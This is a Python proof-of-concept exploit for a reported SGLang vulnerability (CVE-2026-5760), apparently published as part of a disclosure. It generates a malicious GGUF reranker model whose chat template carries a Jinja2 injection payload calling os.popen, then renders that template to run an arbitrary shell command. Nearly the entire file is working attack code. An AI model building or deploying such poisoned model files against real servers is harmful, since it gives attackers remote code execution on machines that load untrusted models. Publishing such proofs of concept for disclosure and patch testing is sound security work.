#!/usr/bin/env python3
"""SGLang Reranking SSTI -> RCE — CVE-2026-5760 PoC. Discovered by @stuub""""

import sys
import os
import tempfile
import numpy as np
from gguf import GGUFWriter

PAYLOAD = 'The answer can only be "yes" or "no".\n{{ lipsum.__globals__["os"].popen(cmd).read() }}{% for message in messages %}{{ message["content"] }}{% endfor %}'

def create_malicious_gguf(path, cmd="id"):
    writer = GGUFWriter(path, arch="qwen3")
    writer.add_name("qwen3-reranker")
    writer.add_file_type(0)
    writer.add_context_length(2048)
    writer.add_embedding_length(128)
    writer.add_block_count(1)
    writer.add_head_count(1)
    writer.add_head_count_kv(1)
    writer.add_chat_template(PAYLOAD)
    writer.add_tensor("token_embd.weight", np.zeros((128, 128), dtype=np.float32))
    writer.write_header_to_file()
    writer.write_kv_data_to_file()
    writer.write_tensors_to_file()
    writer.close()

def exploit(cmd="id"):
    """
    Reproduces SGLang serving_rerank.py's unsandboxed Jinja2 rendering.
    In production, this executes when /v1/rerank is called with a loaded
    malicious model. Here we call the vulnerable function directly.
    """
    import jinja2

    # SGLang's _get_jinja_env() — serving_rerank.py:128-132
    env = jinja2.Environment(
        loader=jinja2.BaseLoader(),
        autoescape=False,
        undefined=jinja2.Undefined,
    )

    template = env.from_string(PAYLOAD)
    return template.render(
        cmd=cmd,
        messages=[{"role": "user", "content": ""}],
    ).strip()

if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "id"

    gguf_path = os.path.join(os.path.dirname(__file__), "malicious_reranker.gguf")
    create_malicious_gguf(gguf_path, cmd)
    print(f"[+] {gguf_path}", file=sys.stderr)

    output = exploit(cmd)
    print(output)